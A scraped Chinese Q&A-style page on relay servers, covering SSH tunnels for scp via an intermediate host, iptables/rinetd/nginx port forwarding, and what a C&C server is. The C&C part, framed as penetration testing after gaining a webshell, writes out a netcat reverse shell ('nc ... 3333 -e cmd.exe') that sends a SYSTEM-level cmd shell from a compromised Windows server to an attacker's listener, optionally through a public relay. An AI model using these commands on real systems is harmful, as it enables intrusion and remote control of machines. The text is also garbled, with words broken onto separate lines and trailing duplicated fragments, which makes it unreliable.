文章目录:
linux SCP怎么样从A服务器发送数据经过B服务器中转到C服务器
实现的方法有很多,我给你说个ssh隧道的方法吧
在A服务器上使用如下ssh隧道命令
ssh -Nf -L 60022:C的IP:C的ssh端口 登陆B的用户@B的IP /dev/null 21
这样你scp 自已的60022端口,就是scp C的ssh端口了
scp -Brp -P 60022 你本地的文件 登陆C的用户@127.0.0.1:要cp到C的目录
如何搭建一个中转服务器?
可以使用iptables或者nginx进行连接搭建。
Linux下端口转发一般都使用iptables来实现,使用iptables可以很容易将TCP和UDP端口从防火墙转发到内部主机上。但是如果需要将流量从专用地址转发到不在您当前网络上的机器上,可尝试另一个应用层端口转发程序Rinetd。Rinetd短小、高效,配置起来比iptables也简单很多。
如果你要配http、https转发,要配ssl证书,那nginx大概是最合适的了。不过要注意nginx本身有一些限制,比方说一次上传的数据大小。之前我没注意这点,在主站配了又配,最后发现中转的服务器没配置,秀逗了。另外新版的nginx不仅可以转发http,也支持tcp流转发了。
数据中转站中安装有数据中转应用服务器,由计划任务或者其他唤醒程序启动。
运行时注意的三步如下:
1、开启源服务器网络连接,连接源服务器,约定下次通讯的方式(可选),获取数据。
2、关闭与源服务器网络的连接,开启目标服务器网络连接,向目标服务器写入数据。
3、关闭与目标服务器网络的连接,进入缄默模式,等待下一次被唤醒。
什么叫做中转服务器?
就是客户端和服务器之间架起的一个枢纽,用来传递客户端和服务器信息的,我们常说的服务器代理就是一种中转服务器。
什么是C&C服务器
CC
服务器的全称是
Command
and
Control
Server,翻译过来就是命令和控制服务器
通常在做渗透测试的时候,在拿到一个
webshell
的时候,需要对服务器进行提权操作,如果是一台
windows
的服务器,提权的时候通常是利用本地提权漏洞的
exp
进行溢出提权,有些
exp
可以直接在后面加参数,溢出成功之后执行参数中的命令。
而有的
exp
溢出成功之后是返回一个
system
权限的
cmd,这时就需要将低权限的
cmd
shell
反弹回本地,这里用
nc
在本地执行:nc
-vv
-lp
3333
上述命令的意思是在本地监听一个
3333
端口等待连接,假设电脑
IP
是公网的,并且
IP
为
114.114.114.114,然后在目标服务器就可以执行:nc
114.114.114.114
3333
-e
cmd.exe
上面的命令就可以把远程服务器的服务器权限的
cmd
shell
返回到本地,这时你就可以通过
nc
建立的这个
shell
进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的
CC
服务器。
扩展资料:
CC
服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。
通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网
IP
地址是:111.111.111.111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。
这里中转服务器的作用就是本地内网的主机监听的端口映射到公网
IP
的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。
或者nginx进行连接搭建。Linux下端口转发一般都使用iptables来实现,使用iptables可以很容易将TCP和UDP端口从防火墙转发到内部主机上。但是如果需要将流量从专用地址转发到不在您当前网络上的机
60022 你本地的文件 登陆C的用户@127.0.0.1:要cp到C的目录如何搭建一个中转服务器?可以使用iptables或者nginx进行连接搭建。Linux下端口转发一般都使用iptables来实现,使用iptables可以很容易将TCP和UDP端口
连接,向目标服务器写入数据。3、关闭与目标服务器网络的连接,进入缄默模式,等待下一次被唤醒。什么叫做中转服务器?就是客户端和服务器之间架起的一个枢纽,用来传递客户端和服务器信息的,我
注意这点,在主站配了又配,最后发现中转的服务器没配置,秀逗了。另外新版的nginx不仅可以转发http,也支持tcp流转发了。数据中转站中安装有数据中转应用服务器,由计划任务或者其他唤醒程序启动。运行时注意的三步如下:1、开启源服务器网络连接,连接源服务器,约定下次通讯的方式(